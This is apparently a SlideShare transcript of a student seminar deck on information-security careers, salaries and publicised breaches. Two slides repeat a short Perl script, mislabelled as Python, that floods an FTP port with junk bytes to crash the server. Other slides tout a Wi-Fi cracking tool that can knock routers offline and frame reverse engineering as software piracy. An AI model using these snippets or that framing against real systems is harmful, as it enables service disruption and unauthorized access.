Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

  • 862 views
Uploaded on

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with …

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal

More in: Education , Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
862
On Slideshare
0
From Embeds
0
Number of Embeds
2

Actions

Shares
Downloads
47
Comments
0
Likes
3

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
  • 2. Acknowledgements Dr. H.S Johal Ms. Himanshi
  • 3. Lil About My Self Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on Web Application Penetration Testing Course Student @ LPU  Tested Over 90+ Servers Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  • 4. Lets Go Old School ,What is EthicalHacking? Breaking Into Devices , Networks Legally. Securing Servers, Recovering Emails etc. But the Question Remains ! Where to get these jobs ?
  • 5. Jobs And Stats
  • 6. Why More Jobs and Less People ? Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking in 2 days workshop :-P No Proper facilities of required courses
  • 7. Salary Packages Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
  • 8. Beyond So Called “Ethical Hacking” Web Application Penetration testing Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
  • 9. Why To Go Beyond Ethical Hacking? Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
  • 10. Jobs Beyond Ethical Hacking:- Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month 
  • 11. Benefits  of not Being a Hacker
  • 12. Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
  • 13. How To Let Your Dreams Come True? Some Highly Paid Fields :- WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing . Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software . Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
  • 14. How To Let Your Dreams Come True? Some Highly Paid Fields :- Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc. Projects :- Good At Coding? Show to the whole world . Forensics : Highest Paid Job in the entire list  Takes A lot , And Pays A lot
  • 15. Why We Need More People ? Source: Indian Express
  • 16. Why We Need More People ? Source: Times Of India
  • 17. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  • 18. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  • 19. Norton India Hacked !! Source: Private
  • 20. Norton India’s Database Hacked !! Source: Private
  • 21. Norton India’s Database Hacked !! Source: Private
  • 22. The Biggest Of All… Anonymous!! Source: National Post
  • 23. Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made , Open Source Applications .• Bugs which may compromise the security , make it vulnerable , helps an attacker to steal sensitive information• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?• Lets See a Simple Example – SQL Injection Bypass
  • 24. Rise Of The Web Applications
  • 25. Fasten Your Seat Belts , Its Showtime DEMO
  • 26. Now Beyond The Word ‘Ethical’ Exploit Writing• Potentially writing codes to exploit a vulnerability .• Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system.• Requirement : C,C++, Perl , Python , Ruby , Assembly language
  • 27. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  • 28. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  • 29. Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  • 30. Now Beyond The Word ‘Ethical’ Reverse Engineering• Editing the final software to find serials keys , stop the online authentications ,• Mostly used by pirates• Sometimes used to edit the features of a final software• Make your Life easier with free products 
  • 31. Now Beyond The Word ‘Ethical’ Wireless Penetration Testing• Involves Auditing of Network Security Over Wireless• Installation of Servers And Security Devices• Crack proofing Wireless Passwords• Highly paid• Requires Networking Background
  • 32. INSANITY WIFI CRACKER Insanity Wi-fi Cracker• Developed By me and my Friends for minor project• Automates the cracking of various wifi securities• Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  • 33. Wi-fi Cracking At a Click Of a Button DEMO
  • 34. So A One Last Question , Wanna go this ?
  • 35. Or Wanna Go This ?
  • 36. After AllIt’s your Career |Handle it with care|
  • 37. Any Questions ?
  • 38. ContactEmail :info@nipunjaswal.comwww.nipunjaswal.comwww.facebook.com/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in